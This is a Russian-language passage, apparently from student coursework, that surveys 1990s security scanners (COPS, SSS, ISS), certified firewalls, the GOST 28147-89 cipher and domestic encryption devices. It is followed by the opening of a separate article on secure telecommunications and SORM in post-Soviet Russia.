• содержание, формат и безопасность паролей и групп паролей;
• файлы с атрибутом смены идентификатора пользователя;
• программы и файлы, запускаемые в /etc/rc/*;
• наличие root - SUID файлов, возможность их записи, и являются ли они подлинными;
• контрольные суммы ключевых файлов, чтобы выявлять любые изменения;
• целостность исполнимого кода системных программ;
• возможность записи файлов пользователей и файлов запуска (.profile, cshrc и т.д.);
• анонимную установку ftp;
• неограниченный ftp, вымышленное имя в sendmail;
• конфигурации протокола NFS;
• проводит различные проверки root;
• наличие отношений доверия с удаленными системами;
• права доступа к домашним каталогам и стартовым файлам пользователей;
• конфигурации почтовой службы;
• наличие сервисных служб;
• даты ознакомления с материалами CERT по безопасности;
• содержит набор правил и попыток для определения того, как может быть скомпрометирована система.
Результатом работы COPS является отчет, который может быть представлен в виде текстового файла либо автоматически отправлен заданному адресату по электронной почте. Устранения обнаруженных уязвимостей данным продуктом не производятся. Вместо этого по результатам сканирования создается командный файл, содержащий последовательность команд по ликвидации выявленных уязвимостей.
COPS может быть запущено от лица пользователя, не обладающего привилегированными правами, однако в данном случае тестирование системы будет неполным.
Среди недостатков можно отметить следующее. Работа COPS приводит к уменьшению производительности системы. При проведении оценки стойкости паролей значительно увеличиваются вычислительные и временные затраты, поэтому запуск COPS рекомендуется производить в часы наименьшей загрузки системы.
Система System Security Scanner (SSS) фирмы Internet Security Systems Inc. — средство разового или регулярного анализа степени безопасности ОС Solaris 2.x, SunOS 4.1.x, Linux 1.2/1.3, AIX 3.2.5, HP-UX 9.05, 10.Х (beta) и управления защищенностью этих систем в соответствии с политикой безопасности организации. SSS осуществляет контроль прав доступа к файлам, проверку владельцев файлов, анализ конфигурации сетевых служб, настройку пользовательских и системных бюджетов. Кроме этого, исследуется возможность наличия закладок и других следов проникновения злоумышленников. Отчеты о результатах анализа содержат детализированное описание найденных уязвимостей и последовательностей действий администратора по их устранению. SSS не производит запуск корректирующего сценария самостоятельно, а только предлагает возможность его применения. Хранение результатов тестирования производится в специальной базе данных, содержащей информацию об известных уязвимостей (их более 250) и способах их устранения.
Система SSS позволят производить распределенное сканирование нескольких удаленных систем с одной управляющей рабочей станции. При этом, конфигурация механизмов сканирования удаленных систем и обработка результатов производится на управляющем ПК, а на удаленных системах запускается только сканирующий агент. Результаты сканирования удаленных систем передаются по протоколу TCP в закодированном виде.
Возможности тестирования системы определяются выбранными для сканирования уязвимостями. SSS позволяет производить сканирование системы с различными специально созданными конфигурациями сканирования, что позволяет заранее настраивать через несколько файлов конфигурации разноуровневое сканирование для периодического тестирования системы. Все обнаруженные уязвимости рассортированы по типам, соответствующим областям системы, и выделены определенным цветом, обозначающим уровень важности.[1]
Пакет программ Internet Scanner SAFEsuite (ISS) предназначен для проведения комплексной оценки эффективности политики безопасности на уровне сетевых сервисов. Он предоставляет возможности для идентификации и коррекции более 140 известных слабых мест и постоянного наблюдения за состоянием безопасности для широкого диапазона сетевых устройств - от Web-узлов и брандмауэров до серверов и рабочих станций, работающих в средах UNIX, Windows 95, Windows NT, и всех других устройств, работающих с протоколом TCP/IP.
Пакет ISS состоит из трех программ: Web Security Scanner, Firewall Scanner, Intranet Scanner. Отметим некоторые общие характеристики пакета ISS.
1. Автоматизированное и конфигурируемое сканирование:
автоматическая идентификация и создание отчетов по слабым местам;
плановое периодическое сканирование или сканирование после определенных событий;
конфигурация сканирования по адресам IP, типам слабых мест, рискам и другим устанавливаемым пользователями критериям;
автоматическая коррекция ключевых слабых мест;
надежность и повторяемость.
2. Обеспечение безопасности:
возможность управления рисками;
инвентаризация всех сетевых устройств и идентификация существующих базовых слабых мест;
распределение приоритетов по степеням риска (высокий, средний, низкий);
анализ и сравнение базовых отчетов для использования в будущих оценках;
создание цепи обратной связи при реализации политики безопасности.
3. Простота пользования:
графические интерфейсы пользователя Windows NT и Motif UNIX;
создание отчетов в формате HTML с упорядочением по типам слабых мест, классам рисков, host-именам и адресам IP;
двухмерная сетевая карта, облегчающая поиск слабых мест;
централизация процедур сканирования, управления и мониторинга.[5]
Программа Web Secure Scanner предназначена для поиска слабых мест безопасности на Web-серверах. Обеспечивает аудит ОС, под управлением которой работает Web-сервер, программ приложений, установленных на Web-сервере, и сценариев CSI в Web-приложениях. Проводит тестирование конфигурации Web-сервера, оценивает уровень безопасности основной файловой системы и просматривает сценарии CSI на наличие слабых мест. По итогам тестирования создается отчет с описанием обнаруженных слабых мест и рекомендациями по корректирующим действиям.
Программа Firewall Scanner обеспечивает поиск слабых мест в брандмауэрах, прежде всего в их конфигурации, и предоставляет рекомендации по их коррекции. Проводит тестирование реакции брандмауэров на различные типы попыток нарушения безопасности. Выполняет сканирование сервисов – идентификацию всех сетевых сервисов, доступ к которым осуществляется через брандмауэр. Программу Firewall Scanner рекомендуется сделать частью установки брандмауэра и составной частью программы обеспечения безопасности.
Программа Intranet Scanner предназначена для автоматического обнаружения потенциальных слабых мест внутри сетей с использованием различных тестов для проверки реакции на несанкционированные проникновения. Обеспечивает проверку различных сетевых устройств, включая UNIX-компьютеры, системы, работающие под управлением ОС Windows NT/95 фирмы Microsoft, маршрутизаторы, Web-серверs и X-терминалы.
1.3. Защита каналов связи в Internet
В июле 1997 г. вышел руководящий документ "Средства вычислительной техники. Межсетевые экраны. Защита от несанкционированного доступа к информации. Показатели защищенности от несанкционированного доступа" Гостехкомиссии при Президенте РФ (полный текст можно найти в информационном бюллетене "Jet Info" № 17-18 1997 г. и на узле http://www.infotecs.ru/gtc/RD_ekran.htm ). В этом документе дана классификация МЭ в зависимости от степени обеспечиваемой ими защиты от НСД. Определение самого МЭ таково: МЭ - это локальное (однокомпонентное) или функционально-распределенное средство (комплекс), реализующее контроль за информацией, поступающей в автоматизированную систему (АС) и/или выходящей из АС, и обеспечивает защиту АС посредством фильтрации информации, т.е. ее анализа по совокупности критериев и принятия решения о ее распространении в (из) АС.
Устанавливается пять классов защищенности МЭ: 5 (самый низкий) — применяется для безопасного взаимодействия АС класса 1 Д с внешней средой, 4 — для 1 Г, 3 — 1 В, 2 — 1 Б, 1 (самый высокий) — для 1А. (Напомним, что Гостехкомиссией РФ установлено девять классов защищенности АС от НСД, каждый из которых характеризуется определенной совокупностью требований к средствам защиты. Классы подразделяются на три группы, отличающиеся спецификой обработки информации. Класс с цифрой "1" включает многопользовательские АС, в которых одновременно обрабатывается и/или хранится информация разных уровней конфиденциальности, и не все пользователи имеют равные права доступа.)
В [2] приведена некоторая справочная информация, где даны описания нескольких систем МЭ. Список сертифицированных Гостехкомиссией РФ МЭ на июнь 1999 г. состоял из десяти наименований:
1) автоматизированная система разграничения доступа Black Hole (Milkyway Networks) версии BSDI-OS;
2) средство защиты от НСД в сетях передачи данных по протоколу TCP/IP "ПАНДОРА" на базе Gauntlet 3.1.Н (Trusted Information Systems) и компьютера 02 (Silicon Graphics) под управлением IRIX 6.3;
3) аппаратно-программный комплекс "Застава-Джет" компании Jet Infosystems и ЦНИИ-27 Министерства обороны РФ;
4) МЭ "Застава" FortE+ фирмы ЭЛВИС+;
5) партия средств программного обеспечения межсетевого экрана FireWall-1 фирмы Checkpoint Software Technologies;
6) комплекс защиты информации от НСД "Data Guard/24S";
7) программный продукт SKIP для регулирования доступа на интерфейсе локальная/глобальная сеть под управлением ОС Windows 3.11 и Solaris 2.4;
8) единичные образцы программного обеспечения МЭ AltaVista Firewall 97 фирмы AltaVista Internet Software;
9) партия из 20 экземпляров МЭ "Cyber Guard" версия 4.0, позволяющего создавать защищенные корпоративные сети на базе протокола Х.25 и Frame Relay;
10) Firewall/Plus фирмы Network-1 Software and Technologies.
Список МЭ, сертифицированных Международной ассоциацией компьютерной безопасности, можно найти по адресу http://www.icsa.net. Ниже более подробно описаны функции одного из них.
Межсетевой экран защиты интрасети ПАНДОРА на базе Gauntlet 3.1.1i фирмы Trusted Information Systems и компьютера 02 фирмы Silicon Graphics под управлением IRIX 6.3 надежно решает проблему безопасности сети и позволяет:
• скрыть от пользователей глобальной сети структуру интрасети (IP-адреса, доменные имена и т.д.);
• определить, каким пользователям, с каких хостов, в направлении каких хостов, в какое время, какими сервисами можно пользоваться;
• описать для каждого пользователя, каким образом он должен аутентифицироваться при доступе к сервису;
• получить полную статистику по использованию сервисов, попыткам НСД, графику через ПАНДОРУ и т.д.
ПАНДОРА устанавливается на компьютер с двумя Ethernet-интерфейсами на выходе между интраеетью и сетью общего пользования.
ПАНДОРА построена на серверах протоколов прикладного уровня (proxy) и поддерживает следующие сервисы: TELNET, Riogin (терминалы); FTP (передача данных); SMTP, POP3 (почта);
HTTP (WWW); Gopher; XI 1 (X Window System); LP (сетевая печать); Rsh (удаленное выполнение задач); Finger; NNTP (новости Usenet); Whois; RealAudio. Кроме того, в состав ПАНДОРЫ входит сервер общего назначения TCP-уровня, который позволяет безопасно транслировать через ПАНДОРУ запросы от базирующихся на TCP протоколов, для которых нет proxy-серверов, а также сервер сетевого доступа, который позволяет запускать различные программы в зависимости от того, откуда пришел запрос.
Для аутентификации пользователей ПАНДОРА позволяет применять следующие схемы аутентификации:
обычный Unix-пароль;
S/Key, MDauth (одноразовые пароли).
РОРЗ-ргоху дает возможность использовать АРОР-авторизацию и тем самым избежать передачи по сети открытого пароля.
FTP-proxy позволяет ограничить применение пользователями отдельных команд (например RETR, STOR и т.д.)
HTTP-proxy позволяет контролировать передачу через ПАНДОРУ фреймов; описаний на языке Java; описаний на языке JavaScript; html-конструкций, не попадающих под стандарт HTML версии 2 и т.д.
Система сбора статистики и генерации отчетов позволяет собрать и обработать информацию обо всех соединениях, включая время, количество байт, адрес источника, адрес назначения, ID пользователя (если есть), а также аномалии в самой системе.
ПАНДОРА не требует ни внесения изменений в клиентское ПО, ни использования специального ПО.
Прозрачный режим работы proxy-серверов позволяет внутренним пользователям соединяться с нужным хостом за один шаг (т.е. без промежуточного соединения с ПАНДОРОЙ).
Система контроля целостности позволяет контролировать безопасность модулей самой системы.
Графический интерфейс управления служит для настройки, администрирования и просмотра статистики ПАНДОРЫ.
ПАНДОРА поставляется вместе с исходными текстами основных программ, для того чтобы можно было убедиться в отсутствии закладок и разобраться, как он работает.
ПАНДОРА сертифицирована Государственной Технической Комиссией при Президенте России. Сертификат N 73 выдан 16 января 1997 г. и действителен до 16 января 2000 г: " ...система защиты информации от НСД в сетях передачи данных по протоколу TCP/IP - межсетевой экран "ПАНДОРА" (ТУ N 1-97) на базе межсетевого экрана "Gauntlet" версии 3.1.Н..., функционирующая на платформе операционной системы IRIX v.6.3 фирмы Silicon Graphics, является средством зашиты информации и обеспечивает защиту участка интрасети от доступа извне, не снижая уровня защищенности участка интрасети, соответствует техническим условиям № 1-97 и требованиям Руководящего документа Гостехко-миссии России "Автоматизированные системы. Защита от несанкционированного доступа к информации. Классификация автоматизированных систем и требования по защите информации" в части администрирования для класса ЗБ".
Задача выбора МЭ для каждого конкретного применения -это, главным образом, вопрос верного соотношения требований пользователей к доступу и вероятности несанкционированного доступа. В идеале система должна предотвращать всякое несанкционированное вторжение. Однако, учитывая широкий спектр необходимых пользователям сервисов (Web, ftp, telnet, SNMP, NFS, телефония и видео в Internet, электронная почта и др.), наряду с изначальной открытостью комплекта протоколов TCP/IP, - этого идеала достигнуть очень тяжело. В действительности, мерой эффективности МЭ служит вовсе не его способность к отказу в предоставлении сервисов, но его способность предоставлять сервисы пользователям в эффективной, структурированной и надежной среде. МЭ должны уметь анализировать приходящий и исходящий сетевой трафик и правильно определять, какие действия санкционированы без ненужного замедления работы системы.[2]
И в заключение данного раздела приведем некоторые рекомендации по выбору МЭ, которые выработала Ассоциация "Конфидент".
1). Цена. Она колеблется существенно — от 1000 до 15000 долл. при покупке непосредственно у фирм-производителей, большинство которых находится в США; у российских дилеров эти цифры значительно выше из-за таможенных и налоговых сборов. Интересна и такая цифра - цена МЭ для Windows NT в среднем составляет 6000 долл. К этой цене надо добавить расходы на аппаратную платформу и ОС, которые могут быть весьма значительными и соизмеримыми со стоимостью самого МЭ — например, как в случае использования компьютеров Sun под управлением ОС Solaris. Поэтому с точки зрения экономии разумно применять МЭ, ориентированные на Intel-платформу и ОС DOS, Windows NT, Novel 1 NetWare.
2). Фильтрация. Большинство МЭ работает только с семейством протоколов TCP/IP, что связано с ориентацией разработчиков на потребности западного рынка. Этого достаточно, если МЭ применяется в классическом варианте — для контроля графика между интрасетью и Internet. Но в России, согласно имеющейся статистике, 90 % рынка сетевых ОС составляет Novell Netware и поэтому важна фильтрация IPX-трафика. Кроме того, совершенно необходимой для внутреннего МЭ является способность фильтрации на уровне соединения — например, фильтрации Ethernet-фреймов. К сожалению, эта возможность реализована в очень немногих продуктах (например. Firewall Plus и Eiron Firewall).
3). Построение интрасети — при объединении сети организации с Internet в качестве транспортной магистрали нужно исходить из имеющейся инфраструктуры. С этой точки зрения много возможностей, имеется в Netware: службы каталогов, управления, печати, защиты и работы с файлами; GroupWise и ManageWise управляют электронным документооборотом и сетью; входящий в состав IntranetWare шлюз IPX/IP организует прозрачный доступ с IPX-станций к сервисам TCP/IP с помощью Winsock-совместимого клиентского ПО. Тогда IPX-сервер и IPX-станция не имеют IP-адресов и из Internet в принципе не видны. Поэтому организация атаки на их информационные ресурсы практически невозможна и защита IP-хостов гетерогенной сети IP-IPX решается проще, так как шлюз выполняет по отношению к ним функции МЭ. Примеры таких МЭ: BorderManager фирмы Novell и NetRoad FireWALL фирмы UkiahSoft.
4). Простота эксплуатации. Чтобы снизить текущие эксплуатационные расходы, лучше отдать предпочтение простым в эксплуатации продуктам с интуитивно понятным графическим интерфейсом, иначе богатые возможности по настройке МЭ могут оказаться невостребованными. Этому критерию хорошо соответствуют два продукта — Firewall Plus фирмы Network-1 и NetRoad FireWALL фирмы UkiahSoft.
1.4 Отечественные защищенные системы
Российский стандарт шифрования данных ГОСТ 28147-89
Единственный в настоящее время коммерческий российский алгоритм ГОСТ 28147-89 является универсальным алгоритмом криптографической защиты данных как для крупных информационных систем, так и для локальных вычислительных сетей и автономных компьютеров.
Многолетний опыт использования данного алгоритма показал его высокую надежность и удачную конструкцию. Этот алгоритм может реализовываться как аппаратным, так и программным способом, удовлетворяет всем криптографическим требованиям, сложившимся в мировой практике. Он также позволяет осуществлять криптозащиту любой информации, независимо от степени ее секретности.
В алгоритме ГОСТ 28147-89 используется 256-разрядный ключ, представляемый в виде восьми 32-разрядных чисел, причем, расшифровываются данные с помощью того же ключа, посредством которого они были зашифрованы.
Необходимо отметить, что алгоритм ГОСТ 28147-89 полностью удовлетворяет всем требованиям криптографии и обладает всеми достоинствами алгоритма DES, но лишен его недостатков. В частности, за счет использования специально разработанных имитовставок он позволяет обнаруживать как случайные, так и умышленные модификации зашифрованной информации. В качестве недостатка российского алгоритма надо отметить большую сложность его программной реализации и недостаточно высокую скорость работы.[1]
СУБД “Линтер-ВТ”, разработанной ВНИИ автоматизации управления в непромышленной сфере воронежской фирмой “Рэлекс”, производство которых сертифицировано. Специалисты Лос-Аламосской лаборатории в США считают, что СУБД “Линтер-ВТ” не уступает СУБД фирмы Oracle (“родная” Oracle, чтобы быть сертифицированной, требует доработки, а, кроме того, любой западный продукт может получить сертификат только на определенные партии продуктов, поскольку их производство находится за рубежом). [4]
Криптографические средства семейства “Верба-О” производства МОПНИЭИ(сертифицированы ФАПСИ) . Универсальность установок по умолчанию. Внутренние изменения интерфейса при смене средств незначительны. Спектр применения интерфейса системы защиты информации, приведенного в качестве примера,продукта, приведённого в качестве примера, в весьма широк. Это системы контроля доступа к ресурсам банковской системы (как локальное использование в офисе банка для операторов и клиентов, так и контроль удаленного доступа), системы “банк-клиент”, платежи через Интернет, защищенная почта и многие другие. [3]
2. Интегральные устройства защиты информации
Очень важным вопросом защиты информации является интеграция программно – аппаратных средств обеспечения информационной безопасности. По мнению В. С. Барсукова, имеется явно выраженная тенденция ко все большей интеграции различных средств и систем связи, что вызывает необходимость единого интегрального подхода к регистрации, хранению и обеспечению безопасности всех видов передаваемой информации. Современные СП-приложения с использованием интегрального подхода позволяют обеспечить реализацию интегральных программно-аппаратных средств защиты информации с заданными оперативно-техническими характеристиками. [1]
Из современных отечественных интегральных устройств защиты информации в качестве примера реализации можно отметить разработки фирмы "Силуэт". Отечественная интегральная система "Калейдоскоп- плюс" предназначена для передачи с помощью ПК закрытой текстовой и факсимильной информации по общедоступным каналам связи. В процессе работы информация приводится к единому цифровому виду и шифруется по алгоритму шифрования в соответствии с ГОСТ 28147-89. Скорость шифрования - 3 кбод. Система имеет возможность выработки собственных ключей. Скорость передачи информации до 1200 бод с вероятностью ошибки на знак, равной 10 в степени (-8). Информация передается по каналам связи с использованием типовых модемов отечественного или зарубежного производства. Возможно включение в систему редактора текстовой информации требуемого типа.
Абонентский пункт "МАГ" предназначен для коммерческой шифрованной связи по коммутируемым телефонным и телеграфным каналам. Он обеспечивает:
передачу факсимильной информации;
автоматическое опознавание абонента;
скорость шифрования 40 кбод;
скорость передачи информации до 1200 бод (вероятность ошибки на знак равна 10 в степени (-6);
криптозащиту информации на дисках и в канале связи;
имитозащиту (контроль целостности данных);
диалоговый режим;
использование открытых ключей.
Состав абонентского пункта "МАГ":
IBM PC;
модем;
устройство речевого ввода/вывода на основе микросхемы TMS 320C25;
факсимильный аппарат OKIFAX;
ПО.
Удачной отечественной разработкой является интегральное терминальное устройство "Индекс" фирмы "Скинер", которое предназначено для закрытой передачи речевой, графической, буквенно-цифровой и другой информации по стандартным коммерческим телефонным каналам связи. Интегральное устройство выполнено в виде печатной платы к ПК IBM PC и специального программного обеспечения. Возможен вариант реализации в виде внешнего блока, подключаемого к ПК через параллельный порт. Необходимо отметить, что поскольку аппаратное и программное обеспечение данного интегрального устройства являются общими, то реально выделить в явном виде функциональные блоки устройства не представляется возможным. Поэтому для пояснения возможностей и проведения дальнейшего анализа на рис.1 показаны состав и основные функциональные связи между виртуальными блоками (одни и те же элементы и фрагменты программ могут быть использованы различными блоками).
Как видно из рисунка, основной особенностью данного терминального устройства является не только его многофункциональность (модем, автосекретарь, устройство защиты и т. п.), интеграция различных видов сигналов (телефонных, телеграфных, факсимильных, компьютерных и др.), но и интеграция различных видов обеспечения безопасности (охрана, физическая и экологическая защита, криптозащита, защита от побочных электромагнитных излучений и наводок и др.).
Шифратор
Генератор шума
Интерфейс связи с внешними устройствами
Блок охраны и физической защиты
Блок коммутации и управления
Факс
Автоответчик
Модем
Блок обработки речи (цифровой телефон)
Блок аналогового и цифро-аналогового преобразования
К персональному компьютеру телефонной линии
от датчиков к внешним устройствам
Рис. 1 Функциональная схема интегрального терминального устройства
Основные характеристики и функциональные возможности интегрального терминального устройства "Индекс" в кратком виде представлены в табл. 1.
Таблица 1. Основные характеристики и возможности устройства "Индекс"
Наименование виртуального блока
Характеристики и функциональные возможности
Компьютерный телефон (обработка речи)
Запись и хранение
речевых сообщений
Регистрация телефонных сообщений
Распознавание кодов и
команд
Автодозвон.
Выдача речевых сообщений
Шифратор
Гарантированная
защита всех видов
информации (ГОСТ
28147-89)
Конфиденциальность
и достоверность
информации
Разграничение прав
доступа, цифровая
подпись
Распределение ключей по схеме "открытого ключа"
Коррекция ошибок по протоколу MNP-5 и выше
Скорость передачи
300...2400 бод
Перепроверка номера абонента и кодирование
Цифровая подпись
Факс
Скорость передачи
до 9600 бод
Криптозащита по
ГОСТ 28147-8Э
Сжатие передаваемой информации
Авторегистрация и
Рассылка
Автоответчик
Автоматическая
Регистрация вызовов
в журнал учета
Проверка абонента
обратным вызовом
Передала заготовленных голосовых
сообщений
Запись входящих
Сообщений
Устройство охраны и
физической защиты
Прием сигналов от
Внешних датчиков
Автонабор записанных в память номеров
Передача речевого
сообщения о нарушении
Подключение внешних устройств (в том числе генератора
шума)
Выделяют следующие основные особенности интегрального терминального устройства "Индекс":
реализация возможностей компьютерно-телефонной интеграции;
наличие специального математического обеспечения, представляющего собой единую систему с дружественным пользователю интерфейсом и обеспечивающего единый порядок регистрации и хранения поступающих данных (речевых, факсимильных, цифровых);
дистанционное управление системой с помощью устройств тонального набора;
возможность единого подхода к шифрованию и обеспечение заданного уровня защиты для всех видов информации;
возможность использования интегрального подхода к обеспечению безопасности;
интеграция различных функций в едином устройстве. [1]
Заключение
Анализ современного российского рынка технических средств и услуг обеспечения безопасности показывает, что в настоящее время насчитывается уже более 2 тыс. предприятий и фирм, активно предоставляющих свои услуги и поставляющих специальные технические средства обеспечения безопасности, номенклатура которых уже составляет десятки тысяч наименований. Поэтому основным информационным источником стоимостных и технических характеристик средств и услуг обеспечения безопасности становятся информационно-справочные материалы в виде справочников, каталогов, пособий, БД и т. п. Роль и ценность подобных информационно-справочных материалов постоянно растет, и их трудно переоценить[1].
Результаты анализа показывают, что в последнее время наметилась тенденция к замедлению темпов развития рынка, причем стабилизация определяется главным образом не столько насыщенностью рынка, сколько нерешенностью ряда организационно-правовых вопросов и ограниченными финансовыми возможностями большинства пользователей (учитывая достаточно высокую стоимость специальной техники). По мере стабилизации экономики следует ожидать значительного всплеска интереса к производству и реализации технических средств обеспечения безопасности.
Основной отличительной особенностью современного российского рынка приходится признать подавляющее господство зарубежных технических средств обеспечения безопасности. В предыдущие 5 лет в России подготовлена соответствующая почва для массового выхода зарубежных фирм -производителей техники безопасности на современный российский рынок технических средств и услуг обеспечения безопасности, что подтверждается активным участием их представителей в выставках "МИЛИПОЛ", "Безопасность", "Секьюрити - экспо", "Банк и офис", "MIPS", "Банк", "Интерполитех" и др. Однако необходимо отметить, что ведущие компании Запада в области безопасности, как правило, сегодня еще напрямую на российский рынок не выходят. Их товары представляют в основном российские фирмы-интеграторы.
Интенсивное количественное и качественное развитие современного российского рынка вызвало серьезные изменения в политике фирм - поставщиков технических средств и услуг обеспечения безопасности. Появившаяся в последние годы серьезная конкуренция заставила многие фирмы больше внимания уделять вопросам качества, удлинять гарантийные сроки, вводить дополнительную систему скидок, предлагать покупателю комплексные услуги, начиная с консультаций, поставки технических средств, обследования защищаемых помещений и заканчивая сервисным обслуживанием (профилактикой и ремонтом).
Несмотря на активное продвижение продукции зарубежных фирм - изготовителей и распространителей техники безопасности в Россию, основная их часть до настоящего времени продолжает занимать рынок главным образом регионов Москвы, Санкт-Петербурга и Екатеринбурга[1].
Проведенный анализ рынка услуг обеспечения безопасности показывает, что в настоящее время используется три основных подхода к решению задач обеспечения информационной безопасности: индивидуальный подход с последовательным решением частных задач обеспечения безопасности, комплексный подход с одновременным решением комплекса задач, направленных на достижение единой цели, и интегральный подход - решение задач обеспечения безопасности с использованием общих (единых) технических средств и ПО на принципах интегральной безопасности.
Как правило, в предыдущие годы использовался индивидуальный подход (надо, например, обеспечить безопасность телефонной связи - покупалось устройство закрытия телефонных переговоров). Этот подход является еще основным на современном российском рынке. Однако сегодня уже многие фирмы предлагают целый комплекс услуг и соответствующих технических средств для решения задач обеспечения безопасности. Так, например, проблему безопасности телефонной связи подобные фирмы решают комплексно с одновременным решением ряда задач контроля доступа, физической защиты, закрытия технических каналов утечки информации и использования криптографического закрытия. Естественно, что во-втором случае эффективность решения проблемы обеспечения безопасности будет значительно выше, чем в первом.[1]
Интегральный подход делает только первые шаги, и только некоторые отдельные фирмы могут предложить сегодня, например, для решения задачи обеспечения информационной безопасности программно-аппаратные комплексы обеспечения безопасности, позволяющие на базе единого ПК (интегральной системы) обеспечить безопасность всех видов информации (голосовой, визуальной, буквенно-цифровой и т. п.) при ее обработке, хранении и передаче по каналам связи. Конечно, интегральный подход требует использования наиболее сложных информационных технологий и является в настоящее время более дорогим, чем традиционные. Но он является более эффективным и перспективным.
Список литературы
Барсуков В. С. Безопасность: технологии, средства, услуги. – М.:КУДИЦ-ОБРАЗ, 2001. – 496 с.;
Милославская Н.Г., Толстой А.И. Интрасети: доступ в Internet, защита: Учеб. пособие для вузов. – М.: ЮНИТИ-ДАНА, 2000. - 527 с.;
Аврин С. Безопасность информации в АБС // Банковские технологии № 6, 1998;
Володин А. Защищенность информации // Банковские технологии № 5, 1998;
Кузнецов А., Трифаленков И. Чем измерять защищенность информационных систем // Банковские технологии №8, 1997; |
https://doc4web.ru/informatika/zaschischennie-telekommunikacii.html | Защищенные телекоммуникации | https://doc4web.ru/uploads/files/169/607b47bcad7c67e6c59fb24532c60de6.docx | files/607b47bcad7c67e6c59fb24532c60de6.docx | Защищенные телекоммуникации
Вопрос о возможности применения современных телекоммуникационных решений в бизнес-процессе -- это в первую очередь вопрос о защите конфиденциальной информации. Именно он чаще всего является камнем преткновения на пути к внедрению новых технологий. Как это было В Советском Союзе вопросами секретной связи ведало 8-е Главное управление КГБ СССР, пользователями же секретной связи являлись либо государственные учреждения, либо высокопоставленные партийные чиновники.
Поскольку в СССР только государство имело право на секреты, то вопрос о разработке, производстве и эксплуатации секретных линий связи и соответствующего оборудования, естественно, находился под полным государственным контролем. Для использования различными службами существовало множество разрозненных сетей связи: телефонные сети "Искра-1", "Искра-2", оперативная связь (ОС) спецслужб, пресловутая "вертушка", войсковая радиосвязь, космическая связь и многое другое. Первая особенность сетей секретной связи СССР состояла в следующем: их защищенность гарантировалась в первую очередь не техническими решениями, а организационными мероприятиями, в частности, тем, что эксплуатацией данных сетей занимался специальный персонал. Сама сеть секретной связи, начиная от кабеля и кончая абонентским оборудованием, принадлежала собственно владельцу секретов -- государству. Второй особенностью секретной связи Советского Союза являлась принципиальная несовместимость технических решений и аппаратных средств, использующихся в различных сетях связи. Данное положение вещей удовлетворяло потребителя хотя бы потому, что другие решения отсутствовали.
В силу известных обстоятельств передовые телекоммуникационные технологии в СССР не развивались, и вся связь фактически сводилась к голосовой телефонии, радиотелефонии и телеграфным каналам. Спасение утопающих... В момент распада СССР появились три большие группы потенциальных потребителей услуг секретной связи: независимые государства -- бывшие республики СССР, негосударственные компании и частные лица. При этом естественным их желанием является отсутствие контроля за связью со стороны каких-либо третьих лиц. Экономические преобразования, совпавшие по времени с распадом Советского Союза, привели к появлению независимых компаний-операторов, осуществляющих поставку телекоммуникационных услуг. В этих условиях начал формироваться рынок систем защиты информации.
Поскольку среди телекоммуникационных операторов сегодня существует жесткая конкуренция, то казалось бы естественным продвижение на рынок новых услуг, в том числе услуг по обеспечению конфиденциальной связи. Однако это натолкнулось на две серьезные преграды. Первая -- теоретически преодолимая -- состоит в том, что, как уже упоминалось выше, пользователь желает сам обеспечивать секретность связи, ему не нужно предоставление такой услуги от оператора. Технологически эта проблема разрешима, если все функции защиты переносятся на абонентский комплект, которым распоряжается непосредственно пользователь. Вторая преграда -- юридическая -- оказалась более серьезной. Не погружаясь в дебри законодательства, замечу, что сегодня действует ряд законов и подзаконных актов, регламентирующих применение так называемой СОРМ (системы оперативно-розыскных мероприятий), исходя из требований которой доступ сотрудников спецслужб к информации должен "...обеспечиваться независимо от того, какие способы защиты информации используются...". Следовательно, компания-оператор в принципе не может предоставить пользователю надежных средств для передачи конфиденциальной информации. В частности, такое положение дел с СОРМ (с документами по СОРМ можно познакомиться на страничке www.libertarium.ru) окончательно похоронило мертворожденный проект "Деловая сеть России", в свое время активно продвигавшийся ФАПСИ. В качестве основного отличия данной сети от других ФАПСИ рекламировало "абсолютную конфиденциальность" сообщений.
Профессионалам степень "конфиденциальности" была ясна изначально, а документы по СОРМ прояснили ее остальным. Таким образом, пользователям предлагается самим позаботиться о защите конфиденциальной информации. Как решают эту проблему частные и корпоративные пользователи, рассмотрим ниже. В качестве примеров приведем наиболее часто используемые телекоммуникационные технологии -- фиксированную и мобильную (в том числе спутниковую) голосовую телефонию, а также передачу компьютерных данных. Голосовая стационарная телефония Наиболее доступная для потребителя телефонная сеть общего пользования является одновременно наименее защищенной системой телекоммуникаций. Причин тому множество, это и свободный доступ к кабельным коммуникациям, и устаревшее оборудование, требующее ремонта, а значит, и доступа к нему, богатый выбор подслушивающей аппаратуры и т. д.
Частный пользователь может обеспечить себе защиту телефонной линии в голосовом режиме только одним способом -- установкой специального телефонного аппарата себе и абонентам, с которыми он планирует обмениваться секретной информацией. Сегодня на рынке существуют несколько вариантов аппаратов, обеспечивающих защиту переговоров. Наиболее известны два: "Орех" и Voice Coder 2000. Первый -- ориентировочной ценой 500 долл. за аппарат, второй -- 2500 долл. за комплект из двух аппаратов. Телефон "Орех" обеспечивает защиту переговоров от непрофессиональных и полупрофессиональных попыток прослушивания. Voice Coder 2000 обеспечивает гарантированную защиту телефонных переговоров. Оба аппарата просты в обращении и удобны для пользователя. ФАПСИ предлагает для потенциальных заказчиков телефонную аппаратуру "Гамма 2" по ориентировочной цене 20 000 долл. за пару аппаратов. Как сформирована эта цена -- лично для меня загадка, кроме того, для приобретения этого аппарата необходимо иметь лицензию ФАПСИ на право использовать подобную аппаратуру.
По мнению экспертов и по моему мнению также, данная аппаратура не имеет перспектив на рынке средств защиты информации. Более того, судя по цене, она также не имеет шанса продвинуться и в государственные организации, которые сейчас тоже считают деньги. Насколько известно автору статьи, разработчики этого изделия попытались повторить успех аппаратуры американского производства STU III, которая широко использовалась в США на разных уровнях ответственности, вплоть до Президента США. Эту аппаратуру следует упомянуть также по той причине, что в ней впервые применена новая технология выработки ключа для шифрования речи, а также предпринята попытка стандартизировать средства, используемые для создания сетей секретной связи. Благодаря этому удалось создать невиданную до тех пор по масштабам сеть секретной связи, по которой Президент США может связаться с командирами войсковых подразделений вплоть до командира роты. Кстати, приобрести эту аппаратуру в США и Канаде можно без особых затруднений. Корпоративный пользователь, решая вопросы защиты телефонных каналов, дополнительно к вышесказанному может использовать подключение к телефонной сети общего пользователя через провайдера, обеспечивающего подводку оптоволоконного кабеля непосредственно к офису и подключение через офисную АТС.
